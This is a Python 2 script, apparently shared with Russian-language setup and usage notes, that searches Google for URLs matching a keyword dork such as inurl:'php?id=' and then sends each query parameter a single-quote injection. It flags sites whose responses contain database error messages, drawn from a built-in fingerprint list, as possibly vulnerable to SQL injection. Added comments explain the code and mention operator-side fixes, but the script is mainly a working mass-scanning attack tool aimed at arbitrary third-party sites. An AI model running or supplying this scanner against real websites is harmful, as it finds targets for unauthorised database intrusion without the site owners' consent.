#!/usr/bin/python
# Copyright (C) 2010 <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from multiprocessing import Process
from xgoogle.search import GoogleSearch, SearchError
from itertools import count
import urllib2, sys, argparse
# `global` at module scope is a no-op: strSQLi is already a module-level name.
global strSQLi
# Fragments of verbose database error messages that checkSQLiStr() searches
# for in a fetched page body.  A site is only flagged when one of these
# fragments shows up in the HTTP response, i.e. when engine/driver
# diagnostics are being echoed to the client.  From the site operator's side
# the fix is twofold: build SQL with parameterised queries rather than string
# concatenation, and serve a generic error page so that backend diagnostics
# never reach the response.
strSQLi = ["error in your SQL syntax", # GENERIC
           "Syntax error at", # GENERIC
           "You have an error in your SQL", # MYSQL
           "Division by zero in", # MYSQL
           "not a valid MySQL result", # MYSQL
           "Call to a member function", # MYSQL
           "Microsoft JET Database", # MSACCESS
           "ODBC Microsoft Access Driver" # MSACCESS
           "Microsoft OLE DB Provider for SQL Server", # MSSQL
           "Unclosed quotation mark", # MSSQL
           "Microsoft OLE DB Provider for Oracle", # ORACLE
           "Macromedia][SQLServer JDBC Driver]"] # COLDFUSION
def split(alist, wanted_parts=1):
    """Cut *alist* into *wanted_parts* consecutive slices of near-equal size.

    Slice boundaries are ``k * len(alist) // wanted_parts`` for
    ``k = 0 .. wanted_parts``, so the slices together cover the whole list in
    order and differ in length by at most one element.

    Args:
        alist: any sequence that supports slicing.
        wanted_parts: number of slices to produce; a non-positive value
            yields an empty list.

    Returns:
        A list of ``wanted_parts`` slices of *alist*.
    """
    total = len(alist)

    def edge(k):
        # Start offset of the k-th slice (and end offset of the (k-1)-th).
        return (k * total) // wanted_parts

    return [alist[edge(part):edge(part + 1)] for part in range(wanted_parts)]
def checkSQLi(results, i):
    """Probe this worker's share of search results for error-based SQL injection.

    Args:
        results: list of result lists as produced by split(); each element is
            expected to expose a ``.url`` attribute (assumed from the access
            below -- confirm against the search library's result type).
        i: index of the slice this worker handles.

    Returns:
        Always False -- both after the slice is exhausted and on
        KeyboardInterrupt.  The value is not consumed: the caller runs this
        function as a multiprocessing.Process target, whose return value is
        discarded.

    Reads the module-level ``args`` namespace (verbosity) and, through
    checkSQLiStr(), the ``strSQLi`` fingerprint list.
    """
    # test single quote
    for result in results[i]:
        try:
            # args.verbose is the raw '0'/'1'/'2' string from argparse
            # (choices='012'), so these are single-character string
            # comparisons, not numeric ones.
            if(args.verbose>='2'):
                print "[INFO] Testing URL: %s" % result.url
            # Only URLs that carry a query parameter can be probed.
            if not "=" in result.url:
                if(args.verbose>='2'):
                    print "[INFO] No params available for injection for: %s" % result.url
                continue
            # Every "=" in the URL is rewritten to "='", so each parameter
            # value reaches the server prefixed with a single quote.  A URL is
            # only flagged if the response then contains one of the strSQLi
            # error fragments; sites that use parameterised queries and
            # generic error pages produce no such text.  In the operator's
            # access log this probe is visible as a request whose parameter
            # values all begin with a quote.
            response = urllib2.urlopen(result.url.replace("=", "='"))
            html = response.read()
            # NOTE(review): response is never closed; the socket is released
            # only when the object is garbage-collected.
        except Exception, e:
            # Network/HTTP failures are reported at verbosity >= 1 and the
            # URL is skipped.  KeyboardInterrupt is not an Exception subclass,
            # so it reaches the next handler instead.
            if(args.verbose>='1'):
                print "[ERROR] %s" % e
            continue
        except KeyboardInterrupt:
            return False
        else:
            # Runs only when the fetch succeeded, so html is bound here.
            if(checkSQLiStr(html)):
                print "[INFO] URL: %s" % result.url
                print " Possible vulnerable!"
            else:
                if(args.verbose>='1'):
                    print "[INFO] URL: %s" % result.url
                    print " Not vulnerable."
    return False
def checkSQLiStr(html):
    """Return True if any fingerprint from the module-level strSQLi list occurs in *html*.

    The check is a plain case-sensitive substring search; the first match
    short-circuits the scan.
    """
    for fingerprint in strSQLi:
        if fingerprint in html:
            return True
    return False
def main():
    """Run the Google query and fan each result page out to worker processes.

    Reads the module-level ``args`` namespace (keyword, page, retry, threads,
    verbose).  Never returns normally: every exit path calls sys.exit(), and
    a SearchError simply restarts the outer retry loop.  ``args.stop`` (the
    -s option) is not consulted anywhere here -- paging continues until the
    search library returns an empty page.
    """
    tries = 0
    while True:
        try:
            if(args.verbose>='1' and tries > 0):
                print "[WARNING] (%d) Retrying google search query" % tries
            # Give up after args.retry consecutive failed searches.
            if(tries>=args.retry):
                if(args.verbose>='1'):
                    print "[ERROR] Maximum retries reached..."
                sys.exit()
            else:
                tries = tries + 1
            googleSearch = GoogleSearch(args.keyword)
            googleSearch.page = args.page
            googleSearch.results_per_page = 100
            print args.keyword
            # The loop index is unused; count() just iterates until the
            # search yields no results.  Nothing here advances the page
            # explicitly -- presumably get_results() does so internally;
            # verify against the xgoogle library.
            for i in count():
                allResults = googleSearch.get_results()
                if not allResults: # no more results (pages) were found
                    break
                # One Process per slice of the current page; all workers are
                # started and then joined before the next page is requested,
                # so parallelism never spans pages.
                splitResults = split(allResults, args.threads)
                processes = [Process(target=checkSQLi, args=(splitResults,i)) for i in range(args.threads)]
                if(args.verbose>='1'):
                    print "[INFO] Starting %d threads..." % args.threads
                for p in processes:
                    p.start()
                for p in processes:
                    p.join()
                # A fully processed page resets the retry budget.
                tries = 0
            print "Finished..."
            sys.exit()
            # finished
        except SearchError, e:
            # Reported only at verbosity 2; the outer loop then retries.
            # SystemExit raised above is not an instance of SearchError and
            # is not intercepted here.
            if(args.verbose>='2'):
                print "[ERROR] Search failed: %s" % e
            continue
        except KeyboardInterrupt:
            print "Suspended by user..."
            sys.exit()
if __name__ == '__main__':
    # Command-line front end.  The parsed namespace is left in the module
    # global ``args`` that main() and checkSQLi() read directly.
    parser = argparse.ArgumentParser()
    # Deliberately kept as a string ('0', '1', '2'): the callers compare it
    # with string operators, so adding type=int here would change them too.
    parser.add_argument('-v', dest='verbose', default='0', help='Verbosity level', choices='012')
    # argparse passes string defaults through type=int, so these are ints.
    parser.add_argument('-p', dest='page', type=int, default='0', help='Start google search from page')
    # NOTE(review): -s is parsed but args.stop is never referenced by main().
    parser.add_argument('-s', dest='stop', type=int, default='5', help='Stop at -s page')
    parser.add_argument('-r', dest='retry', type=int, default='4', help='Amount of times to retry after google search timeout')
    # Despite the wording, these are multiprocessing.Process workers.
    parser.add_argument('-t', dest='threads', type=int, default='2', help='Threads for checking SQLi in query results')
    group = parser.add_argument_group('required arguments')
    group.add_argument('-k', dest='keyword', help='Keywords to use on google query', required=True)
    args = parser.parse_args()
    print "Starting..."
    main()
    # main() calls sys.exit() on every exit path, so this line is not
    # expected to be reached.
    sys.exit()
Библиотеки, которые потребуются:
http://argparse.googlecode.com/svn/trunk/argparse.py
https://github.com/pkrumins/xgoogle (<-- эту библиотеку нужно исправить)
Как надо использовать:
usage: scanner.py [-h] [-v {0,1,2}] [-p PAGE] [-s STOP] [-r RETRY]
[-t THREADS] -k KEYWORD
optional arguments:
-h, --help show this help message and exit
-v {0,1,2} Verbosity level
-p PAGE Start google search from page
-s STOP Stop at -s page
-r RETRY Amount of times to retry after google search timeout
-t THREADS Threads for checking SQLi in query results
Example:
./scanner.py -k 'somekeyword inurl:"php?id="' -t 5 -v 1